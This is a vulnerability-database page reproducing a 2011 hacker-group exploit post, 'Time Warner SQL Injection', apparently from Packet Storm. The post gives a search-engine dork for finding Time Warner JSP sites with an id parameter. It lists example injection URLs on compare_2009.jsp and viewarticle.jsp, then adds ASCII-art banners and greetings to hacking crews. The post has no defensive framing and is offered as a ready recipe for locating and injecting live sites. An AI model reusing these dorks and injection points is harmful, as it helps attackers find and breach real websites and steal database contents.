Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormXecuti0N3rPACKETSTORM:102437
HistoryJun 20, 2011 - 12:00 a.m.

Time Warner SQL Injection

2011-06-2000:00:00
Xecuti0N3r
packetstormsecurity.com
21
JSON
`#(+)Exploit Title: Time Warner Company Sensitive Database Disclosure Vulnerability  
#(+)Author : ^Xecuti0n3r  
#(+) Date : 18.6.2011  
#(+) Hour : 13:37 PM  
#(+) E-mail : xecuti0n3r()yahoo.com  
#(+) dork : intext:"A Time Warner Company" filetype:jsp inurl:"?id="  
#(+) Category : Web Apps [WAF Evasive SQli]  
  
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [+] Site : 1337day.com 0  
1 [+] Support e-mail : submit[at]1337day.com 1  
0 0  
1 ######################################### 1  
0 I'm ^Xecuti0n3r member from Inj3ct0r Team 1  
1 ######################################### 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
  
____________________________________________________________________  
____________________________________________________________________  
  
Choose any site that comes up when you enter the dork intext: intext:"A Time Warner Company" filetype:jsp inurl:"?id=" in search engine  
  
  
*SQL injection Vulnerability*  
  
# [+]http://site.com/compare_2009.jsp?id='11439  
# [+]http://site.com/compare_2009.jsp?id=[SQLi]  
# [+]http://site.com/viewarticle.jsp?id='541846  
# [+]http://site.com/viewarticle.jsp?id=[SQLi]  
  
____________________________________________________________________  
____________________________________________________________________  
  
########################################################################  
(+)Exploit Coded by: ^Xecuti0N3r   
(+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r  
(+)Gr33ts to : Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) + All the 31337 Members :)  
(+)<3 to :Indian Cyber Army & Indishell Crew  
(+)Gr33ts to : exploit-id.com , packetstormsecurity.org , securityreason.com  
########################################################################  
`
JSON